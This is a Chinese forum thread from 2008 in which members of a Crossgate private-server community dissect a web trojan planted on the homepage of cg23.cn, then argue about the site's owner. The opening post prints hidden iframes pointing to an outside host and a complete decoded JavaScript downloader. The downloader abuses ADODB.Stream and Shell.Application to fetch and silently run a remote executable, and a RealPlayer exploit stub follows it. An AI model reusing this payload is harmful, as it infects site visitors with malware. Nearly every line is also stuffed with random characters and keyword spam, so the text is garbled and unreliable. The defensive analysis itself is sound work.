Board logo

标题: [讨论] cg23分析 [打印本页]

作者: 黄昏    时间: 2008-2-4 21:47     标题: cg23分析

Host: www.cg23.cn
" q, {! m6 g( Q/ o8 l—魔力私服,魔力宝贝私服技术,DELPHI编程,魔力寶貝, 魔力宝贝, 크로스게이트,クロスゲートContent-Location: http://www.cg23.cn/Index.htm
/ ?1 Z8 N8 w7 S# ^5 [, X. t. }" k* S魔力私服,最新魔力私服,魔力宝贝私服,魔力宝贝私服技术,魔力宝贝私服,私服架设技术,妖城,FLASH,电影,黑客,网络,网吧,破解,入侵,注册表--src
6 c- u# r2 B# e0 p2 m; ?—魔力私服,魔力宝贝私服技术,DELPHI编程,魔力寶貝, 魔力宝贝, 크로스게이트,クロスゲート
  v  V( D% C+ m$ h9 v魔力私服,最新魔力宝贝私服技术交流<script language="JavaScript" type="text/JavaScript" src="http://news.baidu.com/ns?word=title%3A%C4%A7%C1%A6%B1%A6%B1%B4&tn=newsfcu&from=news&cl=2&rn=25&ct=0"></script>
" K# @5 |0 l- T# P5 p+ c7 w  K--百度新闻-魔力宝贝—魔力私服,魔力宝贝私服技术,DELPHI编程,魔力寶貝, 魔力宝贝, 크로스게이트,クロスゲート  u* V0 Z0 N8 Y- Y% w" [
魔力私服,最新魔力宝贝私服技术交流5 M4 D$ i( ^) M
http://wpa.qq.com/pa?p=1:******************魔力私服,最新魔力宝贝私服技术交流) g2 f8 N% Z  d9 s% a' l* M
10数个魔力技术顾问的QQ链接
( I8 _( g; @& u2 P* y' }: {
' w: a1 y6 e/ o6 B9 ?* }, o% {<script src="javascript/jf.js" type="text/javascript"></script>
" _* q" e+ @8 c6 Z0 I6 p—魔力私服,魔力宝贝私服技术,DELPHI编程,魔力寶貝, 魔力宝贝, 크로스게이트,クロスゲート//模仿语言包式的简繁转换功能插件!bbs.mocwww.com" P/ s" V5 c9 ]4 j
bbs.mocwww.com/ x$ l$ q2 ?8 s3 C# c/ p
<script language="javascript" type="text/javascript" src="http://js.users.51.la/1326170.js"></script>
" t* o$ x* m, y魔力私服,最新魔力私服,魔力宝贝私服,魔力宝贝私服技术,魔力宝贝私服,私服架设技术,妖城,FLASH,电影,黑客,网络,网吧,破解,入侵,注册表51.la流量统计
. e9 i' s: J9 C( t—魔力私服,魔力宝贝私服技术,DELPHI编程,魔力寶貝, 魔力宝贝, 크로스게이트,クロスゲート3 e. e9 {$ U# C8 M* f
<script src='http://s71.cnzz.com/stat.php?id=722391&web_id=722391&online=2' language='JavaScript' charset='gb2312'></script>妖城在线论坛2 Q; g/ Z) p7 B& {
cnzz流量统计妖城在线论坛" O4 `( j9 R( l" K
: w8 y7 x7 [6 d7 n3 j) W
<script language="javascript" src="http://count36.51yes.com/click.aspx?id=361527223&logo=12"></script>魔力私服,最新魔力私服,魔力宝贝私服,魔力宝贝私服技术,魔力宝贝私服,私服架设技术,妖城,FLASH,电影,黑客,网络,网吧,破解,入侵,注册表. w. y3 K8 z, h$ u" Q, N
51YES网站统计妖城在线论坛9 `$ V; a0 }7 O% F5 w
  }( e8 t& ?+ @) D( c" E
<iframe src=http://1.100190.com/1.htm?6 width=50 height=0></iframe></a>
" H4 z. q( k. y+ j—魔力私服,魔力宝贝私服技术,DELPHI编程,魔力寶貝, 魔力宝贝, 크로스게이트,クロスゲート下面是1.htm的内容—魔力私服,魔力宝贝私服技术,DELPHI编程,魔力寶貝, 魔力宝贝, 크로스게이트,クロスゲート4 I  ^$ ^/ D7 v" Y* F* p
[<iframe src=http://1.100190.com/d/d.htm width=100 height=100></iframe>
) W* n% Q/ Q$ N—魔力私服,魔力宝贝私服技术,DELPHI编程,魔力寶貝, 魔力宝贝, 크로스게이트,クロスゲート<iframe src=http://1.100190.com/d/06014.htm width=100 height=100></iframe>魔力私服,最新魔力私服,魔力宝贝私服,魔力宝贝私服技术,魔力宝贝私服,私服架设技术,妖城,FLASH,电影,黑客,网络,网吧,破解,入侵,注册表  c: ]1 W. o; U; W; Y. c
<iframe src=http://1.100190.com/d/real.htm width=100 height=100></iframe>

! i. i# L: f" T$ q. d2 f* T0 q魔力私服,最新魔力私服,魔力宝贝私服,魔力宝贝私服技术,魔力宝贝私服,私服架设技术,妖城,FLASH,电影,黑客,网络,网吧,破解,入侵,注册表这里是重点了妖城在线论坛" I% P" F# n; U9 ~( {/ Z
<script language="javascript" type="text/javascript" src="http://js.users.51.la/1586580.js"></script>" G0 ~; X, J, H# E
51.la流量统计—魔力私服,魔力宝贝私服技术,DELPHI编程,魔力寶貝, 魔力宝贝, 크로스게이트,クロスゲート( `* `0 w1 e3 L& h
]
) b' ~; B3 p7 p7 U  q4 f闲来无事,给大家分析一下吧—魔力私服,魔力宝贝私服技术,DELPHI编程,魔力寶貝, 魔力宝贝, 크로스게이트,クロスゲート. V+ ~, ^6 _. w: ?1 e
06014.htm        看名字好像是蛮老的那个溢出洞洞—魔力私服,魔力宝贝私服技术,DELPHI编程,魔力寶貝, 魔力宝贝, 크로스게이트,クロスゲート1 o; h: Y0 _0 i) [
解码后魔力私服,最新魔力宝贝私服技术交流4 P3 Y8 `) ]! s! M6 Z
<script>var fuck,cike;fuck="http://1.111281.com/down.exe";cike="cike.com";try{var ado=(document.createElement("object"));var d=1;ado.setAttribute("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");var e=1;var xml=ado.CreateObject("Microsoft.XMLHTTP","");var f=1;var ln="Ado";var lzn="db.St";var an="ream";var g=1;var as=ado.createobject(ln+lzn+an,"");var h=1;xml.Open("GET",fuck,0);xml.Send();as.type=1;var n=1;as.open();as.write(xml.responseBody);as.savetofile(cike,2);as.close();var shell=ado.createobject("Shell.Application","");shell.Shellexecute(cike,"","","open",0);}catch(e){};</script>
8 h3 y" i" f! t( D1 G" s0 H6 h貌似是个下载者饿,打包了,大家没事研究研究 我就跳过了……魔力私服,最新魔力私服,魔力宝贝私服,魔力宝贝私服技术,魔力宝贝私服,私服架设技术,妖城,FLASH,电影,黑客,网络,网吧,破解,入侵,注册表; @1 V+ V2 Z* B# U
妖城在线论坛' ^! F9 c* v  z
d.htm        解码之
; b4 u: W% F: ]/ n1 S1 H) T8 {! P—魔力私服,魔力宝贝私服技术,DELPHI编程,魔力寶貝, 魔力宝贝, 크로스게이트,クロスゲート<iframe style=display:none src="http://1.100190.com/d/bf.htm"></iframe>8 p1 U3 u' j7 ^( X: E; v7 m% g
呜呜,我们继续
* L5 G, B" F( g- p! B) d) R空文件,可能是后备用的吧
0 p$ G9 C3 p% V2 Y+ r2 O妖城在线论坛
9 ~8 L. R% ^' L4 \魔力私服,最新魔力私服,魔力宝贝私服,魔力宝贝私服技术,魔力宝贝私服,私服架设技术,妖城,FLASH,电影,黑客,网络,网吧,破解,入侵,注册表real.htm        看名字可能根播放器的oday有关
* z, I6 d8 \$ e妖城在线论坛解码之——
2 H$ x7 X5 m8 P/ s" _+ S妖城在线论坛function RealExploit(){afdsffffasdf="flsdajflasdjfl32rewr231ffas";var ……魔力私服,最新魔力私服,魔力宝贝私服,魔力宝贝私服技术,魔力宝贝私服,私服架设技术,妖城,FLASH,电影,黑客,网络,网吧,破解,入侵,注册表" X% G+ k! X" ~+ i7 s  h# P8 @
恩,查资料得知为机器狗病毒,不过不玩这个 不大懂bbs.mocwww.com. `, G+ s9 H6 F2 v  v4 Q9 g' F
好了,确定是网马,至于效果如何,反正我没中招……

0 Q6 U9 z+ }) _- n2 S8 Y% k5 e! M魔力私服,最新魔力私服,魔力宝贝私服,魔力宝贝私服技术,魔力宝贝私服,私服架设技术,妖城,FLASH,电影,黑客,网络,网吧,破解,入侵,注册表
+ G; J5 |& f. }/ L9 ]$ h9 {bbs.mocwww.com就酱子吧,很多防护不好的网站都会被人挂马,希望cde尽快处理,我对其人没有任何恶意的,大家不要有事没事就对他妄加否定,/ n6 e$ z$ D2 z5 @7 [
想想 人家辛辛苦苦为了什么那?开那么多群,没说过收费什么的吧? 有知道的东西就共享出来 也没见藏着掖着吧? bbs.mocwww.com: f4 T" c# X) ]; r5 D* q/ H9 n0 B
紫薇剑是谁我不晓得,
, I! y, B6 q4 E妖城在线论坛但是cg23的ange我还是打过交道的……

% Z+ L9 q) X$ ]/ X3 G, u
! ~% w3 _- Y7 ^1 S<param name="URL" value="http://www.jdzblog.com/uploadfiles/2007-3/327162852.mp3">
0 m/ Y: y& w& r7 G, o, \) y  e妖城在线论坛最后给大家附个音乐 深吸一口气,放松一下,没什么大不了的……
  r. h) F! H! a$ q, }" }0 {

5 @( O" V  H. G6 _魔力私服,最新魔力私服,魔力宝贝私服,魔力宝贝私服技术,魔力宝贝私服,私服架设技术,妖城,FLASH,电影,黑客,网络,网吧,破解,入侵,注册表[ 本帖最后由 myzz01 于 2008-2-4 21:53 编辑 ]
作者: FGMAX    时间: 2008-2-4 21:49

那个是内嵌的JS调用溢出马.很老的一种了..4 c5 a$ r  R' d. n/ Y
LS的兄弟我劝你..; {* [6 z" B+ A, H& l+ \
搞CG,不知道紫薇剑,就和中国人不知道毛泽东一样.魔力私服,最新魔力宝贝私服技术交流( S$ ?. f* c  ]$ X* {. a3 i# E$ G9 S
你没资格说内些话..
作者: FGMAX    时间: 2008-2-4 21:50


! R7 i  e% s& b魔力私服,最新魔力宝贝私服技术交流开那么多群.从来没说过话.
5 Z5 w7 s+ q. Y) w9 M5 n8 h  ^9 R魔力私服,最新魔力宝贝私服技术交流和某XXOO反挂不一样?
' H6 d  X9 Y5 H7 _8 a魔力私服,最新魔力私服,魔力宝贝私服,魔力宝贝私服技术,魔力宝贝私服,私服架设技术,妖城,FLASH,电影,黑客,网络,网吧,破解,入侵,注册表技术群一大堆.问问题没见回.魔力私服,最新魔力宝贝私服技术交流( ?9 S/ l) j' M: k( ^% |
一买他东西积极的很.
; K: p1 j3 c3 Q" g—魔力私服,魔力宝贝私服技术,DELPHI编程,魔力寶貝, 魔力宝贝, 크로스게이트,クロスゲート魔力私服,最新魔力私服,魔力宝贝私服,魔力宝贝私服技术,魔力宝贝私服,私服架设技术,妖城,FLASH,电影,黑客,网络,网吧,破解,入侵,注册表/ j1 j3 A- [8 I

: ~( d. c! I" P% Cbbs.mocwww.com他现在扔出来的东西都是别人淘汰的.妖城在线论坛! ?. C. J. u2 Z7 B6 I1 D+ P' j
也不知道谁抱着一套所谓的反挂,还当宝咧..
作者: 厶⒉姙⒈    时间: 2008-2-4 21:58

这样啊··
作者: 黄昏    时间: 2008-2-4 21:59

那个  资格不晓得要怎么赚取 …… :-)  是不是当中国人只要知道毛泽东就具备中国人的血统了?估计某些知道老毛的小日本要雀跃了……: \; ^" F1 \# a! r* E. X8 \
血统是与生俱来的,根毛泽东关系不大,我的资格 仿佛也根我知道不知道紫薇剑关系不大吧?
: c4 _1 ]3 i6 V+ p9 h1 Q" i+ k" X) P我喜欢根海星兄 妖哥 小男这样说话爽快的人交流,至于不从技术方面讨论问题 而专门搞人事鉴定的……  不是很感冒……魔力私服,最新魔力私服,魔力宝贝私服,魔力宝贝私服技术,魔力宝贝私服,私服架设技术,妖城,FLASH,电影,黑客,网络,网吧,破解,入侵,注册表1 E1 t6 T! h7 \# H
(*^__^*)   随便说说拉 ange真的打了很久叫道的 从我开始研究魔力(快1个月了) 没事都会在QQ上交流下的 ——感觉人有点迷糊 但是没有什么坏心眼吧?
) W; E8 g2 L0 ^8 n& Y6 E& `魔力私服,最新魔力私服,魔力宝贝私服,魔力宝贝私服技术,魔力宝贝私服,私服架设技术,妖城,FLASH,电影,黑客,网络,网吧,破解,入侵,注册表 至于FGMAX :) 我可是加你QQ拜师的哦 可惜你不回复…… 唉  要不现在收下我吧?
作者: FGMAX    时间: 2008-2-4 22:08

我,大家都知道,对话不对人。
- ~; x# Z, q7 m: y妖城在线论坛要是惹着你了就当别在意。
- b$ }4 |, w$ F7 d$ Q2 |/ T2 Ybbs.mocwww.com
7 }7 ?8 d; Q1 ^3 p4 u5 O% ^魔力私服,最新魔力私服,魔力宝贝私服,魔力宝贝私服技术,魔力宝贝私服,私服架设技术,妖城,FLASH,电影,黑客,网络,网吧,破解,入侵,注册表加我人太多,每天问问题人也太多。魔力私服,最新魔力宝贝私服技术交流2 q) I- e9 ]1 v) o
不能一一照料。
5 ?& {! X" Y, _; W1 p魔力私服,最新魔力私服,魔力宝贝私服,魔力宝贝私服技术,魔力宝贝私服,私服架设技术,妖城,FLASH,电影,黑客,网络,网吧,破解,入侵,注册表bbs.mocwww.com$ E  |: t" w4 `" ]
我就收了一个徒弟,晨曦。
9 A) k( a. C5 |$ h! Bbbs.mocwww.com
8 D5 J5 V, G6 V+ xbbs.mocwww.com以后有需要就说,知道肯定告你。
作者: 黄昏    时间: 2008-2-4 22:28

引用:
原帖由 FGMAX 于 2008-2-4 22:08 发表 魔力私服,最新魔力宝贝私服技术交流5 |& \0 L. B6 r/ y9 L2 [
我,大家都知道,对话不对人。
% \8 k: Q% R+ F1 ~. o—魔力私服,魔力宝贝私服技术,DELPHI编程,魔力寶貝, 魔力宝贝, 크로스게이트,クロスゲート要是惹着你了就当别在意。
0 i& D4 S4 n  M$ `" `bbs.mocwww.com魔力私服,最新魔力宝贝私服技术交流- n3 u+ T* P# @) T( ]: G, N
加我人太多,每天问问题人也太多。—魔力私服,魔力宝贝私服技术,DELPHI编程,魔力寶貝, 魔力宝贝, 크로스게이트,クロスゲート! y2 ?; s) v1 L) g( F2 q$ x4 }, u) \
不能一一照料。
1 s' ?: z4 G: N4 W6 z妖城在线论坛妖城在线论坛2 \/ O$ ^7 M. f: i0 d% p7 ~
我就收了一个徒弟,晨曦。
5 i# G* r1 q$ C/ x魔力私服,最新魔力私服,魔力宝贝私服,魔力宝贝私服技术,魔力宝贝私服,私服架设技术,妖城,FLASH,电影,黑客,网络,网吧,破解,入侵,注册表bbs.mocwww.com" @- X# s8 H1 A& H: o( Q
以后有需要就说,知道肯定告你。
' w9 b6 N1 v* x; k6 ^) Q8 r* l4 ]bbs.mocwww.com
' j/ W) u+ B& L—魔力私服,魔力宝贝私服技术,DELPHI编程,魔力寶貝, 魔力宝贝, 크로스게이트,クロスゲート
: \" Z% ]9 z$ z0 I& v魔力私服,最新魔力私服,魔力宝贝私服,魔力宝贝私服技术,魔力宝贝私服,私服架设技术,妖城,FLASH,电影,黑客,网络,网吧,破解,入侵,注册表:)  交个朋友 一起交流饿 …… 我去想办法看懂魔力封包处理部分的代码去…… 想学的东西太多 时间太少 一动就该睡觉了……郁闷 HOHO  晚上见……
作者: 31558770a    时间: 2008-2-4 22:38

回家前 上来看看
* {( @. X' y  U9 f( j$ O0 ^9 }魔力私服,最新魔力宝贝私服技术交流
作者: itsong    时间: 2008-2-4 22:45

RealPlayer 的溢出漏洞,打完RealPlayer溢出补丁的不会中.
作者: k|尛水    时间: 2008-2-4 22:53

RealPlayer 不装呢- -
作者: healcs01    时间: 2008-2-5 08:54

CG23就是白吃,乱吧人的QQ放在他网页上当什么顾问  我日
作者: 黄昏    时间: 2008-2-5 09:50

引用:
原帖由 ?k|尛水 于 2008-2-4 22:53 发表 妖城在线论坛, a1 W2 I: v5 @* J  t4 M( S! Q
RealPlayer 不装呢- -
魔力私服,最新魔力宝贝私服技术交流5 t6 u. H) |/ s3 j* `% i
不装当然就中不了real的0day了,不过其他溢出漏洞不胜枚举,而且就算不中马,被挂马的站访问起来也会很慢…… 经常访问很容易体会出区别…… 中木马也一样 你要经常使用电脑就会有手感的 当机器中木马病毒什么的 你就会感觉不顺手了……
作者: xuyaoxy    时间: 2008-2-5 10:49

呵呵...real我就没装过~~呵呵..
作者: 易凡    时间: 2008-2-6 13:41

我问问无双,是被人挂了还是自己搞的……。它那站流量也没多少,应该不至于坏自己的名声做这种事。
6 S5 P( i4 ?; ^/ ^' j0 t魔力私服,最新魔力宝贝私服技术交流魔力私服,最新魔力私服,魔力宝贝私服,魔力宝贝私服技术,魔力宝贝私服,私服架设技术,妖城,FLASH,电影,黑客,网络,网吧,破解,入侵,注册表6 T8 B3 ?5 f! C; [9 t
现在有马是事实了
作者: 囡囡    时间: 2008-2-6 15:25

没说过收费?那他的高级群谁出的QB,你也不想想
作者: FGMAX    时间: 2008-2-6 16:38

引用:
原帖由 healcs01 于 2008-2-5 08:54 发表
+ e* L1 Q) Y, J+ U- f魔力私服,最新魔力宝贝私服技术交流CG23就是白吃,乱吧人的QQ放在他网页上当什么顾问  我日
魔力私服,最新魔力宝贝私服技术交流2 F; m2 ]" T: r0 u
  不知道有没有我们…—魔力私服,魔力宝贝私服技术,DELPHI编程,魔力寶貝, 魔力宝贝, 크로스게이트,クロスゲート7 b# K# H( \; O; m$ X% E
               反正最近莫名其妙地很多人问问题…
# [2 U6 i* O9 m6 Ybbs.mocwww.com               替他们卖命…还有人很喜欢无双…`?
9 ^! n4 b4 b+ Z# o+ `) K妖城在线论坛
* K( T) A; m! h/ q0 y& Cbbs.mocwww.com




欢迎光临 妖城在线论坛 (http://bbs.mocwww.com/) Powered by Discuz! 6.0.0